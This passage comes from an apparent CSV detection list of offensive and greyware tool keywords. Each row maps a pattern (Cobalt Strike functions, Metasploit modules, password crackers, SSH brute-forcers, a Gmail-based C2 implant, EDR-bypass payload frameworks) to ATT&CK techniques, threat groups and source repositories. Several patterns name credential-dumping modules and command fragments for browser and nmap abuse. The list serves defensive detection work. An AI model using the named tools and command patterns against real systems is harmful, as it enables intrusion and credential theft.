- T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*opencubicles/h8mail*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" +"*OPENCYBER-FR/RustHound*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*openGoldenTicketDialog*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openKeystrokeBrowser*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openPayloadGenerator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*openPayloadGeneratorDialog*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openPayloadHelper*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openPortScanner*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 
- T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*openPortScanner*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openSpearPhishDialog*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the 
tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openssl_heartbleed.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*openssl2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*OpenVAS*","offensive_tool_keyword","openvas","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.openvas.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*openwall.John.appdata.xml*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*openwall.John.desktop*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*openwall/john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 
+"*openWindowsExecutableStage*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*opera* --headless * --dump-dom http*","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","4","5","N/A","N/A","N/A","N/A" +"*opera.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. 
This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","risk of false positives","7","10","N/A","N/A","N/A","N/A" +"*Operative Framework*","offensive_tool_keyword","Operative Framework","Framework based on fingerprint action. this tool is used for get information on a website or a enterprise target with multiple modules.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0007 - TA0011 - TA0007","N/A","N/A","Frameworks","https://github.com/graniet/operative-framework","1","0","N/A","N/A","7","634","180","2023-05-12T06:20:09Z","2017-01-03T08:38:59Z" +"*ophcrack*","offensive_tool_keyword","ophcrack","Windows password cracker based on rainbow tables.","T1110.003 - T1555.003 - T1110.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://gitlab.com/objectifsecurite/ophcrack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*optiv/Ivy.git*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*optiv/Registry-Recon*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","10","10","314","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z" +"*optiv/ScareCrow*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*optiv/ScareCrow*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework 
designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*oracle_default_hashes.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*oracle_default_passwords.csv*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*orbitaldump.py*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" +"*orbitaldump/orbitaldump*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" +"*OrderFromC2 = ReadEmail()*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"*os.execute(*/bin/*nmap --script=$*","greyware_tool_keyword","nmap","Nmap Privilege Escalation","T1548.002 - T1059 - T1068","TA0002","N/A","N/A","Privilege Escalation","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*OS-Command-Injection-Unix-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to 
identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*OS-Command-Injection-Windows-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*OSCP-Archives*","offensive_tool_keyword","OSCP-Archives","resources for red teamers 'During my journey to getting the OSCP. I always come across many articles. Git repo. videos. and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great. I wanted to also build a curated list of the resources that I've collected overtime. 
all in one area for everyone to access.'","T1593 - T1592 - T1596","TA0001 - TA0043 - ","N/A","N/A","Exploitation tools","https://github.com/CyDefUnicorn/OSCP-Archives","1","1","N/A","N/A","7","601","196","2020-09-14T13:01:57Z","2018-09-15T16:18:05Z" +"*osmedeus cloud*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus health*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus provider*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus scan*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus utils*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osx/dump_keychain*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*osx_gatekeeper_bypass.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*OtterHacker/SetProcessInjection*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*ourtn-ftshell-upcommand*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - 